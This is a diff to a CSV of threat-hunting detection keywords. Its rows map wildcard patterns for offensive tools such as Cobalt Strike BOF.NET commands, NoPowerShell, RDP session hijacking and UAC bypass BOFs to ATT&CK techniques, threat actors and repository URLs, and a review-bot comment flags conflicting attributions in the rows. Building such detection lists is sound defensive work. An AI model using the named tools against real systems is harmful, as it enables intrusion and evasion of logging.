Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_execute.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_init*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_job *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_jobkill*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" 
@@ -7904,11 +8051,11 @@ "*bofnet_jobstatus *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_list*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_listassembiles*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_load *.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_shutdown*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BOFNET_Tests*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*bof-quser *.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-quser.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-rdphijack*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" 
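Review bot: The re-added `*bofnet_load *` row still attributes the keyword to nopowershell (category Defense Evasion), while the context row right after it, `*bofnet_load *.*`, attributes the same command to cobaltstrike / BOF.NET (category C2). The first pattern matches everything the second one matches, so one command line yields two hits with conflicting tool, category and technique metadata, and a consumer keyed on the keyword cannot tell which applies. I would record the overlap in this row's `metadata_comment` instead of `"N/A"`, for example `"BOF.NET command used to load NoPowerShell; overlaps *bofnet_load *.*"`, or fold the two rows into one. The same row's technique column still carries `T1086` and `T1500`, which as far as I know ATT&CK has deprecated in favour of `T1059.001` and `T1027.004`. Both points also apply to the other nopowershell rows that this diff touches only for the star count.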
@@ -7921,22 +8068,22 @@ "*bof-trustedpath-uacbypass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*boko.py *","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*bokoscanner.*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and 
